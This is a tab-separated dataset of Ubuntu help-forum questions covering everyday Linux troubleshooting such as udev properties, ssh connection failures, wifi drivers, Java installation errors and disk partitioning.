437689	id_fs_label in udev	what is id_fs_label in udev ? also why does n't it show up when i execute this command : sudo udevadm info -- root -- name=/dev/sdb the output that i get for the above command : vineet @ vineet : ~ $ sudo udevadm info -- root -- name=/dev/sdb [ sudo ] password for vineet : p : /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host9/target9:0:0/9:0:0:0/block/sdb n : sdb s : disk/by-id/usb-jetflash_transcend_4gb_89y61r3z86fy3bg7-0:0 s : disk/by-path/pci-0000:00:1d.0-usb-0:1.3:1.0-scsi-0:0:0:0 e : devlinks=/dev/disk/by-id/usb-jetflash_transcend_4gb_89y61r3z86fy3bg7-0:0 /dev/disk/by-path/pci-0000:00:1d.0-usb-0:1.3:1.0-scsi-0:0:0:0 e : devname=/dev/sdb e : devpath=/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host9/target9:0:0/9:0:0:0/block/sdb e : devtype=disk e : id_bus=usb e : id_instance=0:0 e : id_model=transcend_4gb e : id_model_enc=transcend\x204gb\x20\x20\x20 e : id_model_id=1000 e : id_part_table_type=dos e : id_path=pci-0000:00:1d.0-usb-0:1.3:1.0-scsi-0:0:0:0 e : id_path_tag=pci-0000_00_1d_0-usb-0_1_3_1_0-scsi-0_0_0_0 e : id_revision=1100 e : id_serial=jetflash_transcend_4gb_89y61r3z86fy3bg7-0:0 e : id_serial_short=89y61r3z86fy3bg7 e : id_type=disk e : id_usb_driver=usb-storage e : id_usb_interfaces=:080650 : e : id_usb_interface_num=00 e : id_vendor=jetflash e : id_vendor_enc=jetflash e : id_vendor_id=8564 e : major=8 e : minor=16 e : subsystem=block e : udisks_partition_table=1 e : udisks_partition_table_count=1 e : udisks_partition_table_scheme=mbr e : udisks_presentation_nopolicy=0 e : usec_initialized=925775101 i am looking for the property that corresponds to the volume label of a usb mass storage device . in my case i was looking for a property that is equal to uui .
437691	files disappearing and reoccuring causing new file to disappear	i 've a minecraft server running on a server with ubuntu server . one day i got a power out and my world file disappeared . i created a new world and started playing on it . after sevral restarts and world saves the old world file came back and replaced the new one . it happend after i had restarted the pc for the 5th time since the new world-file was created and the old deleted . please help ! i 'm a noob when it comes to this os . thanks in advance !
437693	ca n't remove youtube icon from sound indicator	i 've tried to remove youtube player from sounds menu in ubuntu 13.10 but it does n't worked . i 've done all these things from this webupd8 site . i 've already added to blacklisted player but it still shows in sound menu gsettings get com.canonical.indicator.sound interested-media-players : [ 'youtubeyoutubecom.desktop ' , 'rhythmbox.desktop ' ] also i have been tried dconf tools but it still results the same . dconf settings here :
437695	create a user with options	trying to create a new user with the options : username , uid , gid , fullname , homedir , shell and password . this did n't work , any idea ? : useradd -- uid=2002 -- gid=2000 -- create-home=/home/seven -- password=ka3quei8 seven of nine it would be : username : seven , uid : 2002 , gid:2000 , fullname : seven of nine , homedir : /home/seven , shell : /bin/bash , password : ka3quei8 ,
437699	i ca n't connect to the internet wirelessly through xubuntu	complete beginner here . have installed ubuntu through vmware player on my laptop . can connect to the internet fine on windows but not through ubuntu . i have been trying to follow this guide . the network icon allows me to check `` enable networking '' but there is no `` enable wireless '' coming up at all . i followed the `` check if the device is recognized '' and got this output : *-network description : ethernet interface product : 79c970 [ pcnet32 lance ] vendor : advanced micro devices , inc. [ amd ] physical id : 1 bus info : pci @ 0000:02:01.0 logical name : eth0 version : 10 serial : 00:0c:29 : ee : f3:26 width : 32 bits clock : 33mhz capabilities : bus_master rom ethernet physical logical configuration : broadcast=yes driver=pcnet32 driverversion=1.35 latency=64 link=yes maxlatency=255 mingnt=6 multicast=yes resources : irq:19 ioport:2000 ( size=128 ) memory : e7b00000-e7b0ffff it does n't say enabled , disabled , claimed or unclaimed anywhere . i also attempted the `` checking for connection to the router '' section and got : lo no wireless extensions . eth0 no wireless extensions . any advice ?
437702	which os should i install first ?	which system shall i install on a brand new computer ? can i install ubuntu 14.04 first and wait a whilte with windows 8 , undtil i get enoght money to buy it ?
437706	`` file does not contain a valid cil image '' error while executing file with mono	i am trying to run superoneclick using mono.i tried the following command mono ./superoneclick.exe i also tried mono superoneclick.exe but both give an error stating can not open assembly 'superoneclick.exe ' : file does not contain a valid cil image . what should i do ?
437714	eclipse displays png as a text file	i want to create an app in eclipse with libgdx . but when i import a png file into eclipse it displays it as a text file . i tried with the android developmet kit from google , but the same problem as well . i think this is an ubuntu specific problem , because previously i worked on a windows xp computer with eclipse , and there was n't this problem . i have eclipse kepler on ubuntu 13.10 . i hope someone can help me .
437716	python installs application to its own directory	some time ago i created virtual environment according to guides on the net , ever since i can not install python application from source directory into system path with sudo python setup.py install instead it install it into source folder by creating build , dist , **.egg.info directories in it . i can run application from within folder but i want it to install into system default paths . how can i fix it ?
437717	how to ssh from windows to my ubuntu machine in the local network	when i 'm trying to ssh to my local ubuntu server from the gitbash on my windows machine im getting this error : $ ssh 192.168.1.11 ssh : connect to host 192.168.1.11 port 22 : bad file number other answers i 've found seems to be related to linux-to-linux connetions . i 'm newbie here , can you please provide information how to achieve that ? running nmap -ss 192.168.1.11 -p 22 : c : \users\me > nmap -ss 192.168.1.11 -p 22 starting nmap 6.40 ( http : //nmap.org ) nmap scan report for 192.168.1.11 host is up ( 0.0040s latency ) . port state service 22/tcp filtered ssh mac address : 20:16 : d8:3e : e0:30 ( liteon technology ) nmap done : 1 ip address ( 1 host up ) scanned in 13.70 seconds running : ssh -v 192.168.1.11 -p 443 : $ ssh -v 192.168.1.11 -p 443 openssh_4.6p1 , openssl 0.9.8e 23 feb 2007 debug1 : reading configuration data /c/users/me/.ssh/config debug1 : applying options for 192.168.1.11 debug1 : connecting to 192.168.1.11 [ 192.168.1.11 ] port 443. debug1 : connect to address 192.168.1.11 port 443 : attempt to connect timed out w ithout establishing a connection ssh : connect to host 192.168.1.11 port 443 : bad file number and even if i edit my .ssh/config like this : host ubuntu.dev hostname 192.168.1.11 user meubuntu and connecting to ssh ubuntu.dev it still does not work
437720	how to mount multiple folders to same hard disk ?	i have a microserver from hp and got a ssd , which i planned to use for the os ( ubuntu server 12.04 ) , while two more harddisk should run in raid 1 . people recommended me that during installation of ubuntu server i should create a mount point pointing to my /home directory , so everything in my /home directory will automatically get backuped within the raid system . i would like to use this raid to replace more folders , like for example i plan to install a svn on the server . usually those files are physically stored in /var/local/svn or something like that , but those svn files i would prefer to store on the raid system ( /home ) . should i just install everything i am planning to backup within folders on my /home - directory ? that does n't really sound like the ubuntu way of handling this . i also know , that i could create more partitions to mount more folders , but i am really not sure on how much space i should reserve for each of them , so i would prefer a more simple approach . what is the ubuntu way of handling this ? and can you maybe recommend me more folders of ubuntu , i might should put on the raid ? are symbolic links the way to go here ?
437721	unable to update the system on ubuntu 12.4	showing message : e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ?
437722	icons missing in gnome-shell , nautilus , totem	last night when i reboot my system , i see that a lot of icons are missing . in gnome shell i do n't have anymore the icon for the sound but i can still click on the space . i have the relative same issue in nautilus , the previous and next button are missing . i tried to change my de for unity or xfce but the result is similar , many icons missing ( but still click-able ) . i searched for answers , i tried some commands written in an archlinux forum like `` gtk-update-icon-cache /usr/share/icons/gnome/ '' but no luck . does anyone have ever encountered this issue with ubuntu ? ( 12.10 ) edit : i read that for arch , in order to repair icons , you must reinstall librsvg . should i resinstall librsvg2-* ? thanks : )
437728	compatability issue	i just bought a new computer it is a : intel ( r ) core ( tm ) i5-2500 cpu @ 3.30ghz 3.30 ghz 4.00 gb of ram , windows 7 ultimate , 64-bit operating system , with service pack 1 an amd radeon hd 7700 series graphics card . i tried to use xubuntu-12.04.4-desktop-amd64.iso from a dvd it started out fine but as soon as it got through the starting page i lost my video . is my computer capable of using this version of xubuntu or do i need to use the 32 bit version or is this just a priority drivers issue with my graphics card ?
437734	i can´t access the data from my external hard disc drive	i have installed ubuntu 13.10 on my new laptop and i want to copy my data from my imac to my new laptpo using an external hard disc drive ( elements 500gb ) . i did a backup on my mac and when i check elements i can see all the data . but as soon as i connect it with my laptop i can´t access the data . it´s not that elements is empty , but it says that i either don´t have the rights to open the folder or the folders are only text documents ... i don´t know if that is important , but on my mac i have to accounts , but i want only the data from one of the accouts on my laptop . i already tried to change the settings of who can access to everybody can read and write but that didn´t change anything . i hope someone can help me . thanks
437735	how do i set deault browser to not rekonq ?	i do n't like rekonq , and i do n't want rekonq , so i uninstalled it . however , now whenever i click on a link in another program ( e.g . a pdf ) it complains that it ca n't find rekonq . i want to keep using kde , but without rekonq - is that possible ? how do i change it to not try to open rekonq ? so far , the only solution i can think of is to make a symlink pointing from `` rekonq '' to the browser i actually want to use . is this the only option ? surely there must be a setting somewhere that i can change , to make rekonq not the default browser ?
437736	access to ms exchange from ubuntu	recently , my organization offered us to connect to our ms exchange account from android . since i am using win xp with vb only to be able to access this account , i thought i could now easily access it straight with ubuntu . i first tried the exquilla plugin for thunderbird , then evolution with evolution-mapi packages ( you have to also install python-samba to have the mapi connection available ) , but without success . with evolution , it tells me that the password was incorrect ( which is not true ) . the parameters i entered were : my full name and email address ( user @ myorg.org ) selection of the server type : exchange mapi server ( as given by the it ) , without `` https : // '' user name `` user '' and domain name ( as given by the it ) checked secure connection i then click on authenticate . it asks me for the password and later rejects it ... do n't tell me to ask the it , they expressly said they would not offer support for this , as there may be too many different way to access the server by our own device ... thanks for any useful though that might cross your mind ! pierre
437738	how to increase ulimit for a user	i logged in with a user informix .i tried to increase its limit using ulimit -n 4096 but i have to increase it to 10000.when i run ulimit -n 5000 its gave me error -su : ulimit : open files : can not modify limit : operation not permitted i modified /etc/security/limits.conf for this user.my username is informix and here is screen shot of mine limits.conf can u please help how to remove this error ? ?
437739	how to get samba serve to follow chmod rules	i am in the process of setting up a samba file serve which i got to work pretty well the only issue that i am now stuck with is the permissions : the set up that i am trying to achieve is to allow one user `` master_user '' to have access to everything mean while another user `` sectech '' has r-w permissions for only certain folders . otherwise the user can only read the files and folders . the file system is ext3 i set the chmod on a file to have wr for the owner and only r for the world and group and i put sectech on the same group as master_user . thank you in advanced p.s here is smb.conf [ datashare ] comment = protection and scada path = /mnt/data force user = master_user writeable = yes read only = no guest ok = no the file dir is /mnt/data/protection/master $ getfacl master # file : master # owner : master_user # group : sectech user : :rwx user : master_user : rwx group : :r -- group : sectech : r -- mask : :rwx other : :r -- /mnt/ ... ./protection $ ls -l //to show the chmod of the folder drwxr -- r -- + 3 master_user sectech 4096 mar 26 18:59 master /mtn/ ... /protection/master $ ls -l //to show permissions of test file tes.txt -rwxr -- r -- 1 master_user sectech 39 mar 23 20:36 tes.txt fstab line of the partition : uuid= '' uuid of partiton '' /mnt/data ext3 defaults , acl 0 2
437742	the number of file descriptors is limited by your shell	i am trying to start informix server . i am getting error when i run command ./oninit .error is the number of file descriptors is limited by your shell . can any one please guideline how to remove this error .
437750	unable to send email	i 'm getting an error message : mail : can not send message : process exited with a non-zero status command date | mail -s `` test '' -r some @ myemail.com some @ myemail.com mailutils install via this command sudo apt-get install mailutils i have did the same in another ec2 server , and that server is working fine . what could be the reason ? debug info : /usr/sbin/sendmail exited with : 75 generic yields 38=function not implemented try to google this error message , but without any luck
437752	openjdk - oracle is better ?	from http : //www.wikihow.com/install-oracle-java-on-ubuntu-linux type/copy/paste : java -version . if you 're having openjdk runtime environment ( icedtea6 1.10pre ) ( 7b15~pre1-0lucid1 ) openjdk 64-bit server vm ( build 19.0-b09 , mixed mode ) ... you have the wrong vendor version of java installed for this exercise . this is what i have . i wonder , why is this a wrong vendor ? what is this vendor ? why should i use oracle java instead ?
437754	samsung ssd 840 pro configuration ?	i am about to buy an ssd 840 pro from samsung and i read i needed to do some configuration on ubuntu in order to not reduce its life , and get the optimal performances . what i wan na know is what i need to do , step by step and simple to use my ssd correctly on ubuntu , which i will install on it . thank you .
437755	dpkg : error processing linux-generic unmet dependency error	dpkg : error processing linux-generic , un met dependency error when sudo apt-get install -f setting up linux-image-generic ( 3.2.0.60.71 ) ... dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.58.69 ) ; however : version of linux-image-generic on system is 3.2.0.60.71. linux-generic depends on linux-headers-generic ( = 3.2.0.58.69 ) ; however : version of linux-headers-generic on system is 3.2.0.60.71. dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
437758	burnt cd keeps coming up unreadable at install	i have burnt a cd for ubuntu 12.04.4 in my asus laptop and have gotten an error that a file is not-readable . i burnt an alternate cd and then a dvd to see if this was an individual media error . it was not . it must be an error with the iso file . i want to have the grub option of selecting either windows 8.1 or ubuntu come up . i am running this from the uefi selection in windows 8.1 . does anyone know if this online provided iso file is corrupt . or a better iso file to install , or maybe i should use a different version of ubuntu or kbuntu ?
437759	dual monitor resolution incorrect depending on video output port used	i am using ubuntu 13.04 , a 27 '' 1920x1080 hd monitor , and a 22 '' 1680x1050 secondary monitor , and have an nvidia geforce gtx 550 ti/pcie/sse2 graphics card . the card has 2 dvi ports , and an hdmi mini port . with the monitor outputs plugged in such that the 27 only has its hdmi cable plugged in , and the 22 '' is plugged into the first dvi port , i experience some oddities within the system settings pertaining to desktop resolution , and display of desktop background images/wallpaper . i previously had the 22 '' plugged into the second port . no real reason , thats just where i stuck it . i moved a week ago , and when setting my computer up in my new house , i had plugged the 22 '' into the first dvi port . no real reason , it was closer this time . at the login screen , everything is fine , except the physical position of the screens is backwards from what i would expect . this is not a big deal to me . once logged in , the 27 '' will have the unity launcher in the middle of its screen , and the desktop wallpaper will be set to 1680x1050 . however the screen is still rendering in 1920x1080 . the desktop has its xy 0,0 position in the center of the screen , and draws half the screen to the right . the other half of the screen begins on the left . i would take a screen shot of this , but the native screen shot app crashes every time it takes a picture , and the resulting .png is corrupt . the 22 '' renders as expected ( correctly ) . once i move my mouse , the unity launcher reverts back to its correct position on the left . the desktop appears correctly centered , though it still renders the wallpaper image at 1680x1050 ( movies , web videos , applications , etc all render in hd correctly at 1920x1080 ) . if i enter `` displays '' in system settings , everything appears correct , the monitors are lined up in expected order , the resolutions are correct , etc . when i enter `` appearance '' in system settings , the desktop resolution states that it is 1680x1050 . when i manually change the desktop wallpaper , it will change the resolution to the correct setting , and the wallpaper will fill the desktop size to 1980x1050 . i use a desktop rotation app ( wally ) and when it changes the desktop wallpaper , it immediately reverts to 1680x1050 . there is no setting in the application to control this , and its set to fill the screen ( it no longer does ) . rebooting also reintroduces this problem . i went into compiz display settings , and everything appeared as correct . i took it off of smart mode anyway , and forced the setting to prefer larger screen . no effect . i removed and reinstalled wally , also no effect . i played around with a number of dconf/gconf , compiz , and system settings , and nothing had an effect . it was as though i couldnt really control my desktop wallpaper display size in any way , and it was married to 1680x1050 instead of 1920x1050 . just out of curiosity , i powered down and switched the dvi port for the 2nd monitor . its now in the 2nd dvi port , and everything displays as expected . all settings are correct . im baffled - why is it that i couldnt control this at the software level ? why does the dvi port matter beyond any reason other than positioning of the screens ( which can be corrected in display settings ) ?
437761	all wifi networks stopped working	it seems like my wifi card is bricked but i ca n't figure out why . the symptoms started after a suspend/resume though i ; m not sure if that 's connected . i was just browsing and suddenly the connection dropped . the symptoms : unable to connect to any wifi network ( open or secure ) scanning for networks works fine secure networks ask for a password and security type is recognised issues started seemingly spontaneously rebooting/turning hardware switch on and off does n't fix it . other info : ubuntu 13.10 amd 64 wifi hardware : 04:00.0 network controller : intel corporation wifi link 5100 dmesg output while connecting ( same for open or secure networks ) : wlan0 : authenticate with xx : xx : xx : xx : xx : xx wlan0 : direct probe to xx : xx : xx : xx : xx : xx ( try 1/3 ) wlan0 : direct probe to xx : xx : xx : xx : xx : xx ( try 2/3 ) wlan0 : direct probe to xx : xx : xx : xx : xx : xx ( try 3/3 ) wlan0 : authentication with xx : xx : xx : xx : xx : xx timed out lspci -vv -s 04:00.0 04:00.0 network controller : intel corporation wifi link 5100 subsystem : intel corporation wifi link 5100 agn control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping-serr+ fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- kernel driver in use : iwlwifi sudo lshw -c network *-network description : wireless interface product : wifi link 5100 vendor : intel corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 00 serial : xx : xx : xx : xx : xx : xx width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.11.0-18-generic firmware=8.83.5.1 build 33692 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:46 memory : f8000000-f8001fff sudo modinfo iwlwifi filename : /lib/modules/3.11.0-18-generic/kernel/drivers/net/wireless/iwlwifi/iwlwifi.ko license : gpl author : copyright ( c ) 2003-2013 intel corporation version : in-tree : description : intel ( r ) wireless wifi driver for linux firmware : iwlwifi-100-5.ucode firmware : iwlwifi-1000-5.ucode firmware : iwlwifi-135-6.ucode firmware : iwlwifi-105-6.ucode firmware : iwlwifi-2030-6.ucode firmware : iwlwifi-2000-6.ucode firmware : iwlwifi-5150-2.ucode firmware : iwlwifi-5000-5.ucode firmware : iwlwifi-6000g2b-6.ucode firmware : iwlwifi-6000g2a-5.ucode firmware : iwlwifi-6050-5.ucode firmware : iwlwifi-6000-4.ucode firmware : iwlwifi-3160-7.ucode firmware : iwlwifi-7260-7.ucode srcversion : 4e0989c8df6e607c718e63c alias : pci : v00008086d000008b3sv*sd00008570bc*sc*i* ... ... . and much more of this ... alias : pci : v00008086d00004232sv*sd00001201bc*sc*i* depends : cfg80211 intree : y vermagic : 3.11.0-18-generic smp mod_unload modversions parm : swcrypto : using crypto in software ( default 0 [ hardware ] ) ( int ) parm : 11n_disable : disable 11n functionality , bitmap : 1 : full , 2 : agg tx , 4 : agg rx ( uint ) parm : amsdu_size_8k : enable 8k amsdu size ( default 0 ) ( int ) parm : fw_restart : restart firmware in case of error ( default true ) ( bool ) parm : antenna_coupling : specify antenna coupling in db ( defualt : 0 db ) ( int ) parm : wd_disable : disable stuck queue watchdog timer 0=system default , 1=disable , 2=enable ( default : 0 ) ( int ) parm : nvm_file : nvm file name ( charp ) parm : bt_coex_active : enable wifi/bt co-exist ( default : enable ) ( bool ) parm : led_mode:0=system default , 1=on ( rf on ) /off ( rf off ) , 2=blinking , 3=off ( default : 0 ) ( int ) parm : power_save : enable wifi power management ( default : disable ) ( bool ) parm : power_level : default power save level ( range from 1 - 5 , default : 1 ) ( int ) more info update dmesg | grep iwl [ 3.336919 ] iwlwifi 0000:04:00.0 : ca n't disable aspm ; os does n't have aspm control [ 3.336983 ] iwlwifi 0000:04:00.0 : irq 46 for msi/msi-x [ 3.370102 ] iwlwifi 0000:04:00.0 : loaded firmware version 8.83.5.1 build 33692 op_mode iwldvm [ 3.402744 ] iwlwifi 0000:04:00.0 : config_iwlwifi_debug disabled [ 3.402749 ] iwlwifi 0000:04:00.0 : config_iwlwifi_debugfs enabled [ 3.402751 ] iwlwifi 0000:04:00.0 : config_iwlwifi_device_tracing enabled [ 3.402754 ] iwlwifi 0000:04:00.0 : config_iwlwifi_p2p disabled [ 3.402757 ] iwlwifi 0000:04:00.0 : detected intel ( r ) wifi link 5100 agn , rev=0x54 [ 3.408813 ] iwlwifi 0000:04:00.0 : l1 enabled ; disabling l0s [ 3.492316 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' [ 2566.224293 ] iwlwifi 0000:04:00.0 : l1 enabled ; disabling l0s [ 2566.227369 ] iwlwifi 0000:04:00.0 : radio type=0x1-0x2-0x0 [ 2566.327560 ] iwlwifi 0000:04:00.0 : l1 enabled ; disabling l0s [ 2566.330703 ] iwlwifi 0000:04:00.0 : radio type=0x1-0x2-0x0 [ 4337.574663 ] iwlwifi 0000:04:00.0 : l1 enabled ; disabling l0s [ 4337.577746 ] iwlwifi 0000:04:00.0 : radio type=0x1-0x2-0x0 [ 5268.070169 ] iwlwifi 0000:04:00.0 : rf_kill bit toggled to disable radio . [ 5268.070522 ] iwlwifi 0000:04:00.0 : not sending command - rf kill [ 5268.070534 ] iwlwifi 0000:04:00.0 : not sending command - rf kill [ 5268.070571 ] iwlwifi 0000:04:00.0 : not sending command - rf kill [ 5268.070592 ] iwlwifi 0000:04:00.0 : not sending command - rf kill [ 5268.120045 ] iwlwifi 0000:04:00.0 : not sending command - rf kill [ 5270.446578 ] iwlwifi 0000:04:00.0 : rf_kill bit toggled to enable radio . [ 5270.449224 ] iwlwifi 0000:04:00.0 : l1 enabled ; disabling l0s [ 5270.452498 ] iwlwifi 0000:04:00.0 : radio type=0x1-0x2-0x0 iwlist scan output cell 07 - address : xx : xx : xx : xx : xx : xx channel:11 frequency:2.462 ghz ( channel 11 ) quality=70/70 signal level=-39 dbm encryption key : on essid : '' deepthought '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 22 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000001a9f19a1b7 extra : last beacon : 3004ms ago ie : unknown : 000b4465657054686f75676874 ie : unknown : 010582848b962c ie : unknown : 03010b ie : unknown : 050c000100000000000000000000 ie : unknown : 2a0100 ie : unknown : 32080c1218243048606c ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk is there any way to confirm that the device is bricked ? or can i fix this ?
437762	vboxmanage not finding vms after upgrading ubuntu	for the first time ever i got an ubuntu ( 12.04 ) `` internal error `` that hung up my computer and halted the vms i run in virtualbox . it had been a while ( maybe 6 months ) since i upgraded my system with updates so i ran apt-get update and then apt-get upgrade . for good measure i rebooted my system . all is pretty well . in fact , the virtualbox vms that i startup automatically started up just fine . i can see them running in the virtualbox virtualbox manager ( gui ) . those all run headless . there is one vm i like to start manually when i need it ( a windows 7 vm ) . as usual i fired up the terminal and ran vboxmanage startvm windows7vm . vboxmanage complained with a `` could not find a registered machine named 'windows7vm ' etc . in fact none of the vboxmanage command can find any of my vms . the virtual manager ( gui ) works fine for all commands . for the record , vboxmanage was working perfectly before the upgrade . i could apt-get remove virtualbox but i am worried that after i apt-get intall virtualbox ( basically reintall vbox ) that the vm configurations will be gone ... which i want to avoid . any ideas of the problem or how to solve it ?
437763	wifi problems with ubuntu 12.04	i have installed ubuntu 12.04 lts on my new lenovo z710 . the situation is that everything is working ( i can surf internet with the cable ) the laptop can connect to the wireless , but there is no internet . when i connect my laptop with the wifi hotspot from my samsung s3 , it responds , but not normally . can you please suggest a solution .
437764	how to limit apt-listchanges mails to only security-updates	i am using apt-listchanges to email me a summary of software on my servers . i would like to limit these to security-updates and/or urgency=high changes . so that i receive only mail from a server when there is a security-release or any other urgent release . is this possible with apt-listchanges ? or is there some other tool that could replace apt-listchanges , with this functionality built in ? my current apt-listchanges is the default config as it comes with the installation ; i did not edit anything . the file /etc/apt/listchanges.conf contains : [ apt ] frontend=pager email_address=root confirm=0 save_seen=/var/lib/apt/listchanges.db which=news
437769	wintv-hvr/linux me tv	i found on the product website how to get the wintv-hvr 950 ( is a tv tuner that allows you to watch fta tv on computer ) to work in linux . i followed the link but all i get is a text document . i tried several commands in the terminal but nothing . do you have any more suggestions ? tried me tv ( an app i found in ubuntu app center ) and did n't work .
437776	ubuntu 13.04 - unable to install jdk7	i have an ubuntu 13.04 64-bit installed and i would like to install jdk 7 for oracle sql developer . my problem is when i try to install it i get the next : kwarr @ kwarr-k54ly : ~ $ sudo apt-get install oracle-java7-installer reading package lists ... done building dependency tree reading state information ... done suggested packages : visualvm ttf-kochi-gothic ttf-sazanami-gothic ttf-kochi-mincho ttf-sazanami-mincho ttf-arphic-uming the following new packages will be installed : oracle-java7-installer 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/17,6 kb of archives . after this operation , 110 kb of additional disk space will be used . preconfiguring packages ... selecting previously unselected package oracle-java7-installer . ( reading database ... 200447 files and directories currently installed . ) unpacking oracle-java7-installer ( from ... /oracle-java7-installer_7u51-0~webupd8~1_all.deb ) ... oracle-license-v1-1 license has already been accepted processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for shared-mime-info ... setting up oracle-java7-installer ( 7u51-0~webupd8~1 ) ... downloading oracle java 7 ... -- 2014-03-22 15:18:09 -- http : //download.oracle.com/otn-pub/java/jdk/7u51-b13/jdk-7u51-linux-x64.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 77.109.171.147 , 77.109.171.160 connecting to download.oracle.com ( download.oracle.com ) |77.109.171.147|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u51-b13/jdk-7u51-linux-x64.tar.gz [ following ] -- 2014-03-22 15:18:10 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u51-b13/jdk-7u51-linux-x64.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 23.54.22.140 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |23.54.22.140|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : http : //download.oracle.com/errors/download-fail-1505220.html [ following ] -- 2014-03-22 15:18:10 -- http : //download.oracle.com/errors/download-fail-1505220.html connecting to download.oracle.com ( download.oracle.com ) |77.109.171.147|:80 ... connected . http request sent , awaiting response ... 200 ok the file is already fully retrieved ; nothing to do . download done . removing outdated cached downloads ... sha256sum mismatch jdk-7u51-linux-x64.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have already searched the internet and find some solution that worked for people : sudo rm /var/lib/dpkg/info/oracle-java7-installer* sudo apt-get purge oracle-java7-installer* sudo rm /etc/apt/sources.list.d/*java* sudo apt-get update sudo add-apt-repository ppa : webupd8team/java sudo apt-get update sudo apt-get install oracle-java7-installer and sudo dpkg -p oracle-java7-installer sudo apt-get -f install sudo apt-get install oracle-java7-installer but none of them worked for me . still get the same message . could someone help me with this ?
437781	ubuntu install unknown partitions	so i want to install ubuntu and im booting from usb . im new to ubuntu . when i click something else , it shows 4 partions : the first of 1mb , sda1 , unknown free space , second of 100mb sda2 ( that i know its system recovery from win7 ) , third is 170gb ( win7 ) sda3 , and the last one is like 830gb , i dont know where this came from ... . on windows i have them separated . is this a bug or something ? how to install without losing all my data and keeping win7 ? when i try without installing i get to see my 3 partions ( 170gb , 600gb , 230gb ) but not when i try to install . edit ubuntu @ ubuntu : ~ $ sudo gdisk -l /dev/sda outputs this : gpt fdisk ( gdisk ) version 0.8.7 partition table scan : mbr : mbr only bsd : not present apm : not present gpt : not present *************************************************************** found invalid gpt and valid mbr ; converting mbr to gpt format in memory . *************************************************************** disk /dev/sda : 1953525168 sectors , 931.5 gib logical sector size : 512 bytes disk identifier ( guid ) : 2729aee7-a594-4a07-91df-96116b581067 partition table holds up to 128 entries first usable sector is 34 , last usable sector is 1953525134 partitions will be aligned on 8-sector boundaries total free space is 2044 sectors ( 1022.0 kib ) number start ( sector ) end ( sector ) size code name 1 63 2047 992.5 kib 4200 windows ldm data 2 2048 206847 100.0 mib 4200 windows ldm data 3 206848 245762047 117.1 gib 4200 windows ldm data 4 245762048 1953523119 814.3 gib 4200 windows ldm data and , ubuntu @ ubuntu : ~ $ sudo fdisk -l outputs this : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x13344b63 device boot start end blocks id system /dev/sda1 63 2047 992+ 42 sfs partition 1 does not start on physical sector boundary . /dev/sda2 * 2048 206847 102400 42 sfs /dev/sda3 206848 245762047 122777600 42 sfs /dev/sda4 245762048 1953523119 853880536 42 sfs
437783	how do i install ubuntu server from usb without internet access ?	ca n't get past the `` choose a mirror of the ubuntu archive '' step in the installation without having internet access , is there any workaround ?
437788	how can i move the close/minimize/expand to the right in gnome 3 ?	iâm currently using gnome 3 shell in classic mode and i was wandering if it was possible to move the close , minimize , expand window icons from the left side to the right corner ( a la windows ) . old habits die hard and this seams to be an extreme case ... oh , and iâm running the 12.04 release
437789	unindent selected lines in gedit	i 'm using the gedit text editor . for a single line , we can simply press backspace to remove the indentation on that particular line . how can i select several lines and unindent them all ?
437790	booting ubuntu on a windows machine	i 'm all entirely new to this . i 'm hoping to convert from windows to some flavour of linux - here ' what happens when i try : - i downloaded a ubuntu iso image and burnt it to a dvd . when i boot from it : - two little icons appear at the bottom of the screen ( man + keyboard ? ) after several minutes i temporarily get a pure-grey screen plus responsive mouse-pointer 3 after a while longer the screen goes black , then briefly flashes a slightly lighter shade of black ( ! ) and the mouse pointer appears . then it goes black again . this sequence repeats for about 10 minutes after which i give up and go and make a cup of tea instead . i have repeated the above but loading the iso image to a usb stick . the identical sequence occurs . i assume the overall boot sequence should not take the 15 minutes i 've allowed so far , so i have a problem . does anyone know what i 'm doing wrong ? my computer runs xp/sp3 with 1.25gb ram and at least 8gb disc space spare on each of its 3 disc drives .
